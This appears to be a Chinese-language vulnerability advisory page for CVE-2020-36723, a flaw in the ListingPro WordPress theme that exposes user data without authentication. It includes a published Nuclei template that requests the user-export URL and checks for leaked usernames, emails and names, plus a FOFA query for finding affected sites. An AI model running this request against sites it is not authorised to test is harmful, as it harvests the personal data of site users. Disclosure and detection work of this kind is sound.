CVE-2020-36723: ListingPro < 2.6.1 - Sensitive Data Disclosure

日期: 2025-08-01 | 影响软件: ListingPro | POC: 已公开

漏洞描述

The ListingPro - WordPress Directory & Listing Theme for WordPress is vulnerable to Sensitive Data Exposure in versions before 2.6.1 via the ~/listingpro-plugin/functions.php file. This makes it possible for unauthenticated attackers to extract sensitive data including usernames, full names, email addresses, phone numbers, physical addresses and user post counts.

PoC代码[已公开]

id: CVE-2020-36723

info:
  name: ListingPro < 2.6.1 - Sensitive Data Disclosure
  author: ritikchaddha
  severity: high
  description: |
    The ListingPro - WordPress Directory & Listing Theme for WordPress is vulnerable to Sensitive Data Exposure in versions before 2.6.1 via the ~/listingpro-plugin/functions.php file. This makes it possible for unauthenticated attackers to extract sensitive data including usernames, full names, email addresses, phone numbers, physical addresses and user post counts.
  reference:
    - https://wpscan.com/vulnerability/096e6e16-c14d-42da-8ba3-c271db3385a4/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-36723
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2020-36723
    epss-score: 0.05765
    epss-percentile: 0.90117
    cwe-id: CWE-200
    cpe: cpe:2.3:a:cridio:listingpro:*:*:*:*:*:wordpress:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: cridio
    product: listingpro
    fofa-query: body="/wp-content/plugins/listingpro"
  tags: cve,cve2020,wordpress,wp-plugin,wp,exposure,listingpro

http:
  - method: GET
    path:
      - "{{BaseURL}}/wp-admin/index.php?download-lp-users=yes"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "UserName"
          - "Email"
          - "Full Name"
          - "Listings"
        condition: and

      - type: word
        part: header
        words:
          - "filename="

      - type: status
        status:
          - 200
# digest: 4a0a0047304502203550ce4588b8075f70676ce3afc1a925c299f21f4d408d4ce466405ce1f7a969022100b681cdeb5bfe99fe15f0970331035045236a112a328ffaab19b877573a8fdcc7:922c64590222798bb761d5b6d8e72950

相关漏洞推荐